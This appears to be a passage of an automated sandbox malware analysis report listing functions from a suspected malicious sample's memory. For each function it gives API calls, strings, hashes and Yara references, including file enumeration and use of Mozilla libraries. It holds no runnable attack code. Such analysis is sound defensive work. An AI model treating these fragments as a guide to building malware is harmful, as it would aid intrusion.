                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e4de7f61218caeb0ccdc6ffb853258837a6a7e02d905edce8f2e789acbd0ddad
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d9355782bb4f541450df70746ee4678a3d29c011590d9bbfc0c4a68f33055a0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D041A171909745CFC701EF2CC881A9BB7F5EF8A348F018A1DF985A7611D730E9598B8A
                                                                                                                                                                                                                                                                                                                                  Function 6C613CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C613D19
                                                                                                                                                                                                                                                                                                                                  • mozalloc_abort.MOZGLUE(?), ref: 6C613D6C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: _errnomozalloc_abort
                                                                                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3471241338-2564639436
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: abfd05d4bf5618b5b7cf898aec3c9202ca551f38e433ae3a25e1fca12be29393
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5107bb962fdea173de14bfea202fb48808b408f372d1b35633a1b8ca75a1ac8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abfd05d4bf5618b5b7cf898aec3c9202ca551f38e433ae3a25e1fca12be29393
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C1110831E186889BDF04DF6EC8544EEB7B5EF86319F84C228DC4657A01EB309584C398
                                                                                                                                                                                                                                                                                                                                  Function 6C636DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C636E22
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C636E3F
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • MOZ_DISABLE_WALKTHESTACK, xrefs: 6C636E1D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footergetenv
                                                                                                                                                                                                                                                                                                                                  • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1472356752-1153589363
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d1b66b9527cf06f7ac42b7df47a3ebd3c4d309c1a6fe92165c52bd8b6e6d01e8
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: aa3dfe708f3a3aed403ea651568ae3c8515251a442ee31392e59eeb74b2c7ce2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1b66b9527cf06f7ac42b7df47a3ebd3c4d309c1a6fe92165c52bd8b6e6d01e8
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CCF0E975709240CBDB00CB6AC990A9977716713318FB42165C45947BE1DB21E51BCE9F
                                                                                                                                                                                                                                                                                                                                  Function 6C5E9E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C5E9EEF
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                                                                  • String ID: Infinity$NaN
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1385522511-4285296124
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 934e78cdf99d39e5d3d5a7d56499b56923b3b618ecec8114884933d1bcd40bb5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1f16d4c6328c432ed3badc2b37ea6a24e7555b3e8a0e6728cb340cdf85c730c8
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 934e78cdf99d39e5d3d5a7d56499b56923b3b618ecec8114884933d1bcd40bb5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67F0A9B1600242CBDB00CF1AD9C5BA433F1A707309FB04B58C6440BB81D3756556CA8F
                                                                                                                                                                                                                                                                                                                                  Function 6C5E6C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0Kal,?,6C614B30,80000000,?,6C614AB7,?,6C5D43CF,?,6C5D42D2), ref: 6C5E6C42
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C5ECA10: malloc.MOZGLUE(?), ref: 6C5ECA26
                                                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(0Kal,?,6C614B30,80000000,?,6C614AB7,?,6C5D43CF,?,6C5D42D2), ref: 6C5E6C58
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: moz_xmalloc$malloc
                                                                                                                                                                                                                                                                                                                                  • String ID: 0Kal
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1967447596-2504143369
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: de8ed62cae307c3c79cbc35bc68e2f4e8e149b4e77ce163f98aedd3c9396100d
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40E086F1A107094ADB08D9789C0956E75C8CB7C6E87044A35E93AC6BC8FF54E9508151
                                                                                                                                                                                                                                                                                                                                  Function 00413E2B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16filestringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileNextlstrcat
                                                                                                                                                                                                                                                                                                                                  • String ID: q?A
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3840410801-4084695119
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                                                                                                                                                                                                                                                                                                                  Function 6C62B5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C62B2C9,?,?,?,6C62B127,?,?,?,?,?,?,?,?,?,6C62AE52), ref: 6C62B628
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6290E0: free.MOZGLUE(?,00000000,?,?,6C62DEDB), ref: 6C6290FF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C6290E0: free.MOZGLUE(?,00000000,?,?,6C62DEDB), ref: 6C629108
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C62B2C9,?,?,?,6C62B127,?,?,?,?,?,?,?,?,?,6C62AE52), ref: 6C62B67D
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C62B2C9,?,?,?,6C62B127,?,?,?,?,?,?,?,?,?,6C62AE52), ref: 6C62B708
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C62B127,?,?,?,?,?,?,?,?), ref: 6C62B74D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: freemalloc
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3061335427-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 47f66ef3882a445623deb7de551440892097436c6b633750fa512d263049104e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4e0f776fcdad556d5c3405aa7ea04e6eb235480ce1ceeea87d33b54d0dd7ead9
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47f66ef3882a445623deb7de551440892097436c6b633750fa512d263049104e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A451AE71A052168FDB14CF18C980AAEB7B5FFC5308F55852DC89BAB710D739A804CFA9
                                                                                                                                                                                                                                                                                                                                  Function 6C626E50 Relevance: 5.1, APIs: 4, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6C626EAB
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6C626EFA
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C626F1E
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C626F5C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: malloc$freememcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4259248891-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cb4444de10137cbd29c00d56e706b582e26f301478a02803c5e7634fd6e9f76c
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 180c0776edc34ceba998e63a918f06a2745cc89f33af255fcd614f09db26d7eb
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cb4444de10137cbd29c00d56e706b582e26f301478a02803c5e7634fd6e9f76c
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6312671A1060A8FDB14CF2CCD806AA73FAEB84304F60813DD41ACB651EF36E659CB95
                                                                                                                                                                                                                                                                                                                                  Function 6C63B580 Relevance: 5.1, APIs: 4, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6C5E0A4D), ref: 6C63B5EA
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6C5E0A4D), ref: 6C63B623
                                                                                                                                                                                                                                                                                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6C5E0A4D), ref: 6C63B66C
                                                                                                                                                                                                                                                                                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000002,?,?,6C5E0A4D), ref: 6C63B67F
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: malloc$free
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1480856625-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: c561bb69ec692aee036ed559b288e1b2c73c239ddd1b232413dff1eeb8ad9dfc
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 0162bfb6be52be801d6a401079ee90941f007e1092e601cbd0e033f910d57a8c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c561bb69ec692aee036ed559b288e1b2c73c239ddd1b232413dff1eeb8ad9dfc
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A31F471B006268FDB10CF59CC8465ABBB5FFC6314F5A9529C80A9B202DB31E915CBA4
                                                                                                                                                                                                                                                                                                                                  Function 6C60F5A0 Relevance: 5.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C60F611
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C60F623
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,00010000), ref: 6C60F652
                                                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C60F668
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2610723772.000000006C5D1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610691108.000000006C5D0000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610794119.000000006C64D000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610829698.000000006C65E000.00000004.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2610864490.000000006C662000.00000002.00000001.01000000.00000013.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_6c5d0000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3510742995-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6db68e1a2087bafc1bc5b3d0aaa9a3c15342b7008b7056d0057b0c8f9deb4753
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA316F71B00614AFC719CF1DCDC0A9B77B6EB94358B14C938FA4A8BB05D632E9448B9D